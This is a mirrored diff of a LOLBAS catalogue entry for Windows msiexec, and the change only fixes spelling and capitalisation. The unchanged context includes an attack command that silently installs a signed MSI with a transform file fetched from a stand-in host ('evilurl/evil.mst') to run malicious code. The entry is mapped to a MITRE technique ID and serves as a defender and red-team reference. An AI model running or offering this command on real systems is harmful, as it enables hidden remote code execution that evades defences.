mirror of
				https://github.com/LOLBAS-Project/LOLBAS
				synced 2025-11-04 02:29:34 +01:00 
			
		
		
		
	@@ -37,12 +37,12 @@ Commands:
 | 
			
		||||
    Tags:
 | 
			
		||||
      - Execute: DLL
 | 
			
		||||
  - Command: msiexec /i "https://trustedURL/signed.msi" TRANSFORMS="https://evilurl/evil.mst" /qb
 | 
			
		||||
    Description: Installs the target .MSI file from a remote URL, the file can be signed by vendor. Additional to the file a Transformfile will be used, which can contains malicious code or binaries. The /qb will skip user input.
 | 
			
		||||
    Usecase: Install trusted and signed msi file, with additional attack code as Treansorm file, from remote server
 | 
			
		||||
    Description: Installs the target .MSI file from a remote URL, the file can be signed by vendor. Additional to the file a transformation file will be used, which can contains malicious code or binaries. The /qb will skip user input.
 | 
			
		||||
    Usecase: Install trusted and signed msi file, with additional attack code as transformation file, from a remote server
 | 
			
		||||
    Category: Execute
 | 
			
		||||
    Privileges: User
 | 
			
		||||
    MitreID: T1218.007
 | 
			
		||||
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
 | 
			
		||||
    OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
 | 
			
		||||
Full_Path:
 | 
			
		||||
  - Path: C:\Windows\System32\msiexec.exe
 | 
			
		||||
  - Path: C:\Windows\SysWOW64\msiexec.exe
 | 
			
		||||
 
 | 
			
		||||
		Reference in New Issue
	
	Block a user